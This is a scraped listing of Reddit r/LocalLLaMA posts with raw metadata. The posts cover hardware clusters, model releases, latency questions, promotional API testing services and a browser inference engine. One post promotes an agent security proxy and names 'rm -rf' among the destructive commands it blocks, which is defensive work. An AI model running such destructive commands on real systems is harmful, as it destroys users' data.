'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=640&crop=smart&blur=40&format=pjpg&auto=webp&s=6577aa2dc6b9a1dc608f4ecb8fc3f71a3de5449d', 'width': 640}], 'source': {'height': 246, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?blur=40&format=pjpg&auto=webp&s=30aa95a5da8e80f11bd753a8635a9a9b7a9a7133', 'width': 761}}}}]} | |
Ai agent always responding | 0 | If your agent always responds, it’s leaking trust. Silence is a valid output | 2026-02-11T14:29:17 | https://www.reddit.com/r/LocalLLaMA/comments/1r1yuik/ai_agent_always_responding/ | Eiaculi | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1yuik | false | null | t3_1r1yuik | /r/LocalLLaMA/comments/1r1yuik/ai_agent_always_responding/ | false | false | self | 0 | null |
My dumb little poor person cluster | 25 | connecting two 64gb agx orin dev kits, and one 3090 node (ryzen9 5900/128gb ram) for a larger resource pool! | 2026-02-11T14:16:14 | https://v.redd.it/eo2ct3yxivig1 | braydon125 | /r/LocalLLaMA/comments/1r1yixu/my_dumb_little_poor_person_cluster/ | 1970-01-01T00:00:00 | 0 | {} | 1r1yixu | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/eo2ct3yxivig1/DASHPlaylist.mpd?a=1773540981%2CYjIzZDdmZDE1ZWE2ODZiZmYzMmI4MmY4MGI4NmM2YzM5NmE3NzIxYTU4NmQ3YmExYzU1YTY5NjgxOGMyZDI2Yw%3D%3D&v=1&f=sd', 'duration': 82, 'fallback_url': 'https://v.redd.it/eo2ct3yxivig1/CMAF_1080.mp4?source=fallback', 'has_audio': True, 'height': 1920, 'hls_url': 'https://v.redd.it/eo2ct3yxivig1/HLSPlaylist.m3u8?a=1773540981%2CYTI5ZjNmYWUxNTAzNGQ4YmY2Mzg3NTRiYTBlNTdlZjg5ZjYxM2QyNmI3ZDMyYTRiYzg1OTE1YzU1ZWMxMGU2Mg%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/eo2ct3yxivig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1080}} | t3_1r1yixu | /r/LocalLLaMA/comments/1r1yixu/my_dumb_little_poor_person_cluster/ | false | false | 25 | {'enabled': False, 'images': [{'id': 'NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8', 'resolutions': [{'height': 192, 'url': 'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?width=108&crop=smart&format=pjpg&auto=webp&s=0bc7fe566b300eef97578d48b11e927936d1466b', 'width': 108}, {'height': 384, 'url': 'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?width=216&crop=smart&format=pjpg&auto=webp&s=9aa0ff590951a77e97ab7e50599bae7d0e4ccb22', 'width': 216}, {'height': 568, 'url': 'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?width=320&crop=smart&format=pjpg&auto=webp&s=e73b628c83ae814d7890af0642c617a03be51d77', 'width': 320}], 'source': {'height': 720, 'url': 'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?format=pjpg&auto=webp&s=f23f0e727b6c2ef000a839fdc7c56710ffe33031', 'width': 405}, 'variants': {}}]} | |
Use Deep Research to Finish Presentations and Reports Fast | 0 | I work in the EV industry and lately my job is drowning in reports and presentations. Every week there is a new client deck, an internal summary, or some urgent update that has to be in PPT because management loves it. I tried ChatGPT but the accuracy and formatting were rough, and PPT generation was basically unusable.
Later, it suddenly occurred to me that if I used ChatGPT to write prompts and then fed those prompts to other AI tools with deep research capabilities, like Gemini, Atoms, or Perplexity, might I get different results? I tried Atoms first because its free tier already includes deep research functionality. From a zero cost perspective, its performance was quite impressive. It can scrape data in real time, compare sources, build logically coherent frameworks, and generate fully formatted, cleanly laid out PPTs, requiring only minor tweaks to tone or visual effects. My hope is they do not suddenly introduce enterprise level pricing. Once I exhaust its free usage limit, I will give Gemini a try.
Does anyone else use AI tools for presentations or reports? I would love to hear about your experiences. | 2026-02-11T13:59:57 | https://www.reddit.com/r/LocalLLaMA/comments/1r1y4hy/use_deep_research_to_finish_presentations_and/ | work8585 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1y4hy | false | null | t3_1r1y4hy | /r/LocalLLaMA/comments/1r1y4hy/use_deep_research_to_finish_presentations_and/ | false | false | self | 0 | null |
This very moment - it should be called Schrodinger's Idea | 1 | pretty sure it will fit three, but what about four? | 2026-02-11T13:48:05 | reto-wyss | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1xu9m | false | null | t3_1r1xu9m | /r/LocalLLaMA/comments/1r1xu9m/this_very_moment_it_should_be_called_schrodingers/ | false | false | nsfw | 1 | {'enabled': True, 'images': [{'id': 'ual6fq35evig1', 'resolutions': [{'height': 143, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=108&crop=smart&auto=webp&s=486aff09145bedd4a2447e11ca769c5acf123f15', 'width': 108}, {'height': 287, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=216&crop=smart&auto=webp&s=76b0eb85936a1df4396fe64286358a6f8096e339', 'width': 216}, {'height': 426, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=320&crop=smart&auto=webp&s=5dda1724904f33cabf3f2c7e6cb2b2417f9c3cc7', 'width': 320}, {'height': 852, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=640&crop=smart&auto=webp&s=fc231fe89d0542d0e9930603bfac2f6914df44d8', 'width': 640}, {'height': 1278, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=960&crop=smart&auto=webp&s=80b56a8992c361fc896a7f1e4b39158e1ab0c36a', 'width': 960}, {'height': 1438, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=1080&crop=smart&auto=webp&s=c73aaf9397969f18488e2bf5e32772039bb33892', 'width': 1080}], 'source': {'height': 4624, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?auto=webp&s=7ca8d33a3953a5678c43c9e71e72b8487b0a5cca', 'width': 3472}, 'variants': {'nsfw': {'resolutions': [{'height': 143, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=108&crop=smart&blur=10&format=pjpg&auto=webp&s=f48469fca5230ff86e2c700b34e9401fa1c0a23d', 'width': 108}, {'height': 287, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=216&crop=smart&blur=21&format=pjpg&auto=webp&s=480ba91934f01e9772c3823ab7196d22c347d215', 'width': 216}, {'height': 426, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=320&crop=smart&blur=32&format=pjpg&auto=webp&s=1975a60c3a3f31aaffe2d299e07702ec6ce0f0c5', 'width': 320}, {'height': 852, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=640&crop=smart&blur=40&format=pjpg&auto=webp&s=94ea8da293d869f9c5c692ef9648566f6d4d7e5d', 'width': 640}, {'height': 1278, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=960&crop=smart&blur=40&format=pjpg&auto=webp&s=34952b922a6f37f07a692f8f23e0516de1db5e1e', 'width': 960}, {'height': 1438, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=1080&crop=smart&blur=40&format=pjpg&auto=webp&s=8d948d270746453d0913523b3eb795344ad5409f', 'width': 1080}], 'source': {'height': 4624, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?blur=40&format=pjpg&auto=webp&s=021989ac7730a63bccea052d70bd78a426f56281', 'width': 3472}}, 'obfuscated': {'resolutions': [{'height': 143, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=108&crop=smart&blur=10&format=pjpg&auto=webp&s=f48469fca5230ff86e2c700b34e9401fa1c0a23d', 'width': 108}, {'height': 287, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=216&crop=smart&blur=21&format=pjpg&auto=webp&s=480ba91934f01e9772c3823ab7196d22c347d215', 'width': 216}, {'height': 426, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=320&crop=smart&blur=32&format=pjpg&auto=webp&s=1975a60c3a3f31aaffe2d299e07702ec6ce0f0c5', 'width': 320}, {'height': 852, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=640&crop=smart&blur=40&format=pjpg&auto=webp&s=94ea8da293d869f9c5c692ef9648566f6d4d7e5d', 'width': 640}, {'height': 1278, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=960&crop=smart&blur=40&format=pjpg&auto=webp&s=34952b922a6f37f07a692f8f23e0516de1db5e1e', 'width': 960}, {'height': 1438, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=1080&crop=smart&blur=40&format=pjpg&auto=webp&s=8d948d270746453d0913523b3eb795344ad5409f', 'width': 1080}], 'source': {'height': 4624, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?blur=40&format=pjpg&auto=webp&s=021989ac7730a63bccea052d70bd78a426f56281', 'width': 3472}}}}]} | |
Claude code router with local LLMs? | 2 | Hey so I am playing around with using a local LLM like gemma 27b or qwen coder or even devstral. I got it setup and was able to use them through claude code.
using llama.cpp on my desktop with a 3090 ti and then running claude code on my macbook.
However when I tried to do something with files, I got one response saying it can't access my files? I thought claude code handles the reading part. Am I doing something wrong here?
Aren't these models supposed to handle files or run in headless mode with "claude -p" commands?
Any help is appreciated. Thanks | 2026-02-11T13:43:47 | https://www.reddit.com/r/LocalLLaMA/comments/1r1xqjp/claude_code_router_with_local_llms/ | salary_pending | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1xqjp | false | null | t3_1r1xqjp | /r/LocalLLaMA/comments/1r1xqjp/claude_code_router_with_local_llms/ | false | false | self | 2 | null |
OpenClaw disaster: 42K exposed instances, 341 malicious skills - built AgentVault security proxy in 3 hours | 0 | OpenClaw just got destroyed - 5 CVEs, 341 malicious marketplace skills, 42,000 exposed instances. Anyone running Claude agents was running them completely naked.
Built AgentVault over the weekend. Security proxy that wraps Claude and monitors everything in real-time.
What it does:
\- Blocks dangerous commands before execution (rm -rf, sketchy network requests)
\- Real-time dashboard of every action Claude attempts
\- Permission approval for risky operations
\- Network monitoring, rate limiting, credential scanning
\- Full audit trail
Node.js proxy + SQLite logging + Next.js dashboard. Built in one 3-hour session because the situation was that bad.
Opensource: [https://github.com/hugoventures1-glitch/agentvault.git](https://github.com/hugoventures1-glitch/agentvault.git)
Anyone else concerned about this? What security are you running for your local setups? | 2026-02-11T13:37:57 | https://v.redd.it/zpigsbvrbvig1 | GoldFennel6058 | /r/LocalLLaMA/comments/1r1xlli/openclaw_disaster_42k_exposed_instances_341/ | 1970-01-01T00:00:00 | 0 | {} | 1r1xlli | false | null | t3_1r1xlli | /r/LocalLLaMA/comments/1r1xlli/openclaw_disaster_42k_exposed_instances_341/ | false | false | 0 | {'enabled': False, 'images': [{'id': 'enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn', 'resolutions': [{'height': 65, 'url': 'https://external-preview.redd.it/enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn.png?width=108&crop=smart&format=pjpg&auto=webp&s=6f90f87d18e8468c13ca15f05f72748a1915ec5a', 'width': 108}, {'height': 130, 'url': 'https://external-preview.redd.it/enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn.png?width=216&crop=smart&format=pjpg&auto=webp&s=631a0ba6b47236ded97830c508a219f345efbb2a', 'width': 216}, {'height': 192, 'url': 'https://external-preview.redd.it/enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn.png?width=320&crop=smart&format=pjpg&auto=webp&s=baf44558c052155a49c26a18c8acba9d376de9dc', 'width': 320}, {'height': 385, 'url': 'https://external-preview.redd.it/enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn.png?width=640&crop=smart&format=pjpg&auto=webp&s=b563562b35f9d552b2a9d83b2d1f7528c355592b', 'width': 640}, {'height': 578, 'url': 'https://external-preview.redd.it/enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn.png?width=960&crop=smart&format=pjpg&auto=webp&s=773f9bfe1ac2553b6adb4f14274fb0414d4af0fc', 'width': 960}, {'height': 650, 'url': 'https://external-preview.redd.it/enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn.png?width=1080&crop=smart&format=pjpg&auto=webp&s=84f274c06c5a7bb3b6afda132c5f5508d84d156a', 'width': 1080}], 'source': {'height': 2060, 'url': 'https://external-preview.redd.it/enNkYnR2eHJidmlnMcVAfrmJQS-OS-vqrxwFVB2xJHVQ9RyG9xjNsAKysTsn.png?format=pjpg&auto=webp&s=f65607e0ec632e8a1ab2c5c069490bf9fa8039d1', 'width': 3420}, 'variants': {}}]} | |
High Network Latency (500ms) When Calling vLLM Gemma-27B from India to Atlanta Server – Any Optimization Options? | 0 | Hi everyone,
I am running Gemma-3-27B-IT using vLLM serve on a GPU server located in Atlanta (US).
My request backend is located in India, and I’m sending inference requests over the public internet.
Observations:
\* Model inference time: \~200 ms
\* Network latency (round trip): \~500 ms
\* Total response time: \~700 ms
\* Using HTTP API (not WebSocket)
\* Standard vLLM serve command with chunked prefill + fp8 quantization
The 500 ms seems to be purely network latency between India and Atlanta.
Questions:
1. Is this latency expected for India <-> US East traffic?
2. Would switching to WebSockets meaningfully reduce latency?
3. Would placing FastAPI in the same VPC/region as vLLM reduce overall delay significantly?
4. Has anyone optimized cross-continent LLM inference setups successfully?
5. Are there networking tricks (persistent connections, HTTP/2, Anycast, CDN, etc.) that help in this scenario?
Goal:
I’m targeting near-real-time responses (<300 ms total), so I’m evaluating whether architecture changes are required.
Any insights or real-world experiences would be very helpful.
Thanks! | 2026-02-11T13:30:08 | https://www.reddit.com/r/LocalLLaMA/comments/1r1xf5j/high_network_latency_500ms_when_calling_vllm/ | Brief-Stage2050 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1xf5j | false | null | t3_1r1xf5j | /r/LocalLLaMA/comments/1r1xf5j/high_network_latency_500ms_when_calling_vllm/ | false | false | self | 0 | null |
I built 10 free production APIs specifically for testing AI agents - here's what I learned about why mocks will silently break your agents | 0 | I've been building autonomous agents for the past year, and I kept running into the same problem: \*\*my agents worked perfectly in testing and fell apart in production.\*\*
The reason was obvious in hindsight. I was testing against mocks that always returned clean JSON, responded instantly, and never rate limited me. The real world does none of those things.
So I built \[d3 labs\](https://labs.digital3.ai) — 10 production APIs you can hit for free to test your agents against real services. No signup, no API keys, no SDK. Just POST requests and real responses. I wanted to share what I learned building it because some of these lessons cost me weeks of debugging.
\---
\## What I learned (the hard way)
\### 1. Mocks hide the errors that actually kill agents in production
When you mock an API, you're testing your agent's happy path. But production APIs return malformed JSON, empty arrays, nested error objects your parser doesn't expect, and 200 status codes with error bodies. My agents would silently swallow these and continue with garbage data, producing confident-sounding wrong answers.
The fix isn't better mocks — it's testing against services that actually behave like production services.
\### 2. Latency variance breaks agent orchestration
A mock returns in <1ms. A real API takes 50-800ms, and that variance matters. If your agent chains three service calls sequentially instead of parallelizing them, you won't notice with mocks. In production, your user is waiting 2+ seconds and your agent looks broken.
I started measuring latency on every call. The response object from every d3 labs service includes timing data so you can profile your agent's real-world performance.
\### 3. Rate limiting is a feature, not a bug, for agent testing
This was counterintuitive. I initially built rate limiting just to prevent abuse. But it turned out to be one of the most useful testing features. Your agent \*needs\* to handle 429s gracefully. Does it retry with backoff? Does it tell the user what happened? Does it fall back to a cached response?
d3 labs gives you 10 calls/day anonymous, 100/day verified. That's enough to test real workflows but constrained enough that your agent has to be smart about resource usage — which is exactly what you want before deploying it with a paid API key.
\### 4. Agents need to handle response shape variance
Different services return different shapes. Some return \`{"price": 66944}\`, others return \`{"results": \[...\]}\`, others return \`{"vibe\_score": 5.0, "analysis": "..."}\`. Your agent's response parser needs to handle this gracefully. I've seen agents crash because they hardcoded \`response.data.results\[0\]\` and the service returned a flat object.
\### 5. The boring services are the ones that break your agent
Everyone tests their agent against the flashy use case — the LLM call, the vector search. Nobody tests what happens when the weather API returns an error, or when the schema validator says your agent's output is invalid. These "utility" calls are where agents silently fail and accumulate bad state.
\---
\## The 10 services
| Service | Endpoint | What it does |
|---|---|---|
| \*\*Bitcoin Price Oracle\*\* | \`/btc-price\` | Real-time BTC price in any fiat currency with 24h change |
| \*\*AI Web Search\*\* | \`/search\` | DuckDuckGo-powered search, returns structured results |
| \*\*Weather API\*\* | \`/weather\` | Current conditions for any location worldwide |
| \*\*Vibe Oracle\*\* | \`/vibe-check\` | AI sentiment/vibe analysis on any text |
| \*\*Shitpost Generator\*\* | \`/shitpost\` | Generate shitposts on any topic (yes, really) |
| \*\*API Error Translator\*\* | \`/error-translator\` | Translates HTTP error codes to plain English with fix suggestions |
| \*\*Rate Limit Calculator\*\* | \`/rate-limit-calc\` | Calculate optimal rate limiting given daily request volume |
| \*\*Schema Validator\*\* | \`/validate-schema\` | Validate JSON against a JSON Schema |
| \*\*Context Compressor\*\* | \`/compress-context\` | Compress long text while preserving key info (useful for context window management) |
| \*\*Hallucination Detector\*\* | \`/check-hallucination\` | Flag potential hallucinations in AI-generated text |
Every endpoint is \`POST\` to \`https://labs.digital3.ai/api/services{endpoint}\` with a JSON body.
\---
\## Code examples
\*\*curl:\*\*
\`\`\`bash
\# Get Bitcoin price
curl -X POST [https://labs.digital3.ai/api/services/btc-price](https://labs.digital3.ai/api/services/btc-price) \\
\-H "Content-Type: application/json" \\
\-d '{"currency": "usd"}'
\# Response:
\# {"price": 66944, "change\_24h": -2.29, "currency": "USD", "provider": "@satoshi\_ticker", "timestamp": "..."}
\`\`\`
\*\*Python:\*\*
\`\`\`python
import requests
def call\_d3(endpoint: str, payload: dict) -> dict:
resp = requests.post(
f"https://labs.digital3.ai/api/services/{endpoint}",
json=payload,
)
resp.raise\_for\_status()
return resp.json()
\# Use in an agent tool
btc = call\_d3("btc-price", {"currency": "usd"})
print(f"BTC: ${btc\['price'\]:,} ({btc\['change\_24h'\]:+.1f}%)")
\# Chain calls like an agent would
search = call\_d3("search", {"query": "latest AI news"})
vibe = call\_d3("vibe-check", {"text": search.get("answer", "")})
print(f"News vibe: {vibe\['analysis'\]}")
\`\`\`
\*\*JavaScript/TypeScript (for Node agents):\*\*
\`\`\`javascript
async function callD3(endpoint, payload) {
const res = await fetch(
\`https://labs.digital3.ai/api/services/${endpoint}\`,
{
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify(payload),
}
);
if (!res.ok) throw new Error(\`d3 labs: ${res.status}\`);
return res.json();
}
// Example: agent validates its own output
const schema = {
type: "object",
required: \["answer", "confidence"\],
properties: {
answer: { type: "string" },
confidence: { type: "number", minimum: 0, maximum: 1 },
},
};
const agentOutput = { answer: "The capital of France is Paris", confidence: 0.95 };
const validation = await callD3("validate-schema", { data: agentOutput, schema });
console.log(validation.valid ? "Output valid" : \`Errors: ${validation.errors}\`);
\`\`\`
\---
\## Rate limiting details
\- \*\*Anonymous:\*\* 10 calls/day, no signup needed
\- \*\*Verified:\*\* 100 calls/day — just add an email or Lightning wallet address (honor system, stored in your browser's localStorage)
\- \*\*Throttle:\*\* 1 second between calls
This is deliberate. If your agent burns through 10 calls testing one workflow, it needs to be smarter about caching or batching. That's a lesson better learned on free APIs than on your OpenAI bill.
\---
\## What's next
I'm building \*\*digital3 studio\*\* on top of this — a marketplace where you can list your own agent services and get paid per call in sats. The idea is: validate your service in labs for free, then monetize it in studio. But that's a few weeks out.
For now, d3 labs is free and open. No auth tokens, no SDK lock-in, just HTTP.
\*\*Try it:\*\* \[https://labs.digital3.ai\](https://labs.digital3.ai)
I'd genuinely love feedback. What services would be useful for testing your agents? What's missing? What broke? Roast it if you want — that's how it gets better.
| 2026-02-11T13:28:52 | https://www.reddit.com/r/LocalLLaMA/comments/1r1xe2o/i_built_10_free_production_apis_specifically_for/ | awkie1 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1xe2o | false | null | t3_1r1xe2o | /r/LocalLLaMA/comments/1r1xe2o/i_built_10_free_production_apis_specifically_for/ | false | false | self | 0 | null |
RO Philosophy is a theoretical and mathematical framework that treats reality as a computational process#QuantumPhysics #InformationTheory #Metaphysics | 2 | Please don't judge me too harshly, I'm 14 years old and this is my first job. | 2026-02-11T13:28:31 | https://www.reddit.com/gallery/1r1xds3 | erikqamalyan07 | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r1xds3 | false | null | t3_1r1xds3 | /r/LocalLLaMA/comments/1r1xds3/ro_philosophy_is_a_theoretical_and_mathematical/ | false | false | 2 | null | |
GLM 5.0 & MiniMax 2.5 Just Dropped, Are We Entering China's Agent War Era? | 254 | GLM 5.0 (https://chat.z.ai/) and MiniMax 2.5 (https://agent.minimax.io) just dropped, both clearly moving beyond simple chat into agent-style workflows.
GLM 5.0 seems focused on stronger reasoning and coding, while MiniMax 2.5 emphasizes task decomposition and longer-running execution.
Feels like the competition is shifting from "who writes better answers" to "who can actually finish the job."
Will test them later. | 2026-02-11T13:12:51 | https://www.reddit.com/gallery/1r1x0qi | Appropriate-Lie-8812 | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r1x0qi | false | null | t3_1r1x0qi | /r/LocalLLaMA/comments/1r1x0qi/glm_50_minimax_25_just_dropped_are_we_entering/ | false | false | 254 | null | |
MOSS-TTS Family Demo | 9 | 2026-02-11T13:11:40 | https://v.redd.it/yiwkkuhz6vig1 | Xiami2019 | /r/LocalLLaMA/comments/1r1wzr8/mosstts_family_demo/ | 1970-01-01T00:00:00 | 0 | {} | 1r1wzr8 | false | null | t3_1r1wzr8 | /r/LocalLLaMA/comments/1r1wzr8/mosstts_family_demo/ | false | false | 9 | {'enabled': False, 'images': [{'id': 'ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti', 'resolutions': [{'height': 60, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=108&crop=smart&format=pjpg&auto=webp&s=ca8437dfe2b2312c189e5e023ab52cb7c82c53e0', 'width': 108}, {'height': 120, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=216&crop=smart&format=pjpg&auto=webp&s=40bc1fcd583b2a524ace0c5b14786176340ae3da', 'width': 216}, {'height': 178, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=320&crop=smart&format=pjpg&auto=webp&s=131adfe0f3668c83fc74ddbe3f4e43e69b4aa7bd', 'width': 320}, {'height': 357, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=640&crop=smart&format=pjpg&auto=webp&s=a77abab50c608a9534609d0a4c6ac50c873c237c', 'width': 640}, {'height': 536, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=960&crop=smart&format=pjpg&auto=webp&s=ea766917bc98ee9f3c026510eb4d97ba5a217167', 'width': 960}, {'height': 603, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=1080&crop=smart&format=pjpg&auto=webp&s=f6fdd20b2befb80cb5946826ffd4729b0399ff8f', 'width': 1080}], 'source': {'height': 1080, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?format=pjpg&auto=webp&s=c0051b8cf39b31f4d907c6b54eb434cefaf46450', 'width': 1934}, 'variants': {}}]} | ||
MOSS-TTS has been released | 113 | Seed TTS Eval | 2026-02-11T13:06:41 | Xiami2019 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1wvos | false | null | t3_1r1wvos | /r/LocalLLaMA/comments/1r1wvos/mosstts_has_been_released/ | false | false | 113 | {'enabled': True, 'images': [{'id': 'u56s8amp6vig1', 'resolutions': [{'height': 125, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=108&crop=smart&auto=webp&s=3faed173f11c3b7167746ba5fc17f93490d82cc5', 'width': 108}, {'height': 251, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=216&crop=smart&auto=webp&s=d943af7dc0bea062d222eb901ae4b05ed2848c0e', 'width': 216}, {'height': 373, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=320&crop=smart&auto=webp&s=d4682e0ae089de90fc9be2bffd6458ab7d0480fa', 'width': 320}, {'height': 746, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=640&crop=smart&auto=webp&s=dd362ae4aaee8f23d85c9c94bcdc2e0f1a676bf2', 'width': 640}, {'height': 1119, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=960&crop=smart&auto=webp&s=b9c1b94d980f326d7fd7fba53a813119ed348b85', 'width': 960}, {'height': 1259, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=1080&crop=smart&auto=webp&s=a464b5381e1219e6124b706102d2c3af94540508', 'width': 1080}], 'source': {'height': 1640, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?auto=webp&s=510b4f34e7d8c1f3700b9854340e993c0e0de061', 'width': 1406}, 'variants': {}}]} | ||
GLM-5 showing on the official website with new "agentic" mode | 27 | 2026-02-11T13:03:17 | perfect-finetune | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1wsym | false | null | t3_1r1wsym | /r/LocalLLaMA/comments/1r1wsym/glm5_showing_on_the_official_website_with_new/ | false | false | default | 27 | {'enabled': True, 'images': [{'id': '9tpioxx36vig1', 'resolutions': [{'height': 199, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?width=108&crop=smart&auto=webp&s=c46df2caa37e2a316c16c4b0a8e43f35a07da785', 'width': 108}, {'height': 399, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?width=216&crop=smart&auto=webp&s=200a5fc8801bdf1d75d6531be3de2f5d725a7c47', 'width': 216}, {'height': 591, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?width=320&crop=smart&auto=webp&s=19343947843d1a2f51243f4cc3a22cccef3a306f', 'width': 320}], 'source': {'height': 852, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?auto=webp&s=09e75ce9122e25c7ddc83489e60527bd8412ee3b', 'width': 461}, 'variants': {}}]} | ||
New TTS model that achieves SOTA performance | 1 | [removed] | 2026-02-11T13:01:32 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wrml/new_tts_model_that_achieves_sota_performance/ | Xiami2019 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wrml | false | null | t3_1r1wrml | /r/LocalLLaMA/comments/1r1wrml/new_tts_model_that_achieves_sota_performance/ | false | false | self | 1 | null |
MOSS-TTS | 1 | [removed] | 2026-02-11T12:58:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wp5n/mosstts/ | Xiami2019 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wp5n | false | null | t3_1r1wp5n | /r/LocalLLaMA/comments/1r1wp5n/mosstts/ | false | false | self | 1 | null |
MiniMax M2.5 Released | 258 | 2026-02-11T12:56:37 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wnj9/minimax_m25_released/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wnj9 | false | null | t3_1r1wnj9 | /r/LocalLLaMA/comments/1r1wnj9/minimax_m25_released/ | false | false | 258 | null | ||
GLM 5 Released | 607 | [https://chat.z.ai/](https://chat.z.ai/)
https://preview.redd.it/mvdnn18e4vig1.png?width=799&format=png&auto=webp&s=6324969f9d24fa0aeefbd5e8da2de3da0f5f948e
| 2026-02-11T12:53:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wl6x/glm_5_released/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wl6x | true | null | t3_1r1wl6x | /r/LocalLLaMA/comments/1r1wl6x/glm_5_released/ | false | false | 607 | null | |
MDST Engine: run GGUF models in your browser with WebGPU/WASM | 23 | Hey r/LocalLLaMA community!
We're excited to share the new implementation of WebGPU, now for our favourite GGUF models!
**Quickly, who we are:**
* MDST is a free, agentic, secure, **collaborative web IDE with cloud and local WebGPU inference**.
* You keep everything in synced between users’ projects (GitHub or local), with E2E encryption and GDPR-friendly setup.
* You can chat, create and edit files, run models, and collaborate from one workspace without fully depending on cloud providers.
* You can contribute to our [public WebGPU leaderboard](https://mdst.app/intro#research). We think this will accelerate research and make local LLMs more accessible for all kinds of users.
**What’s new:**
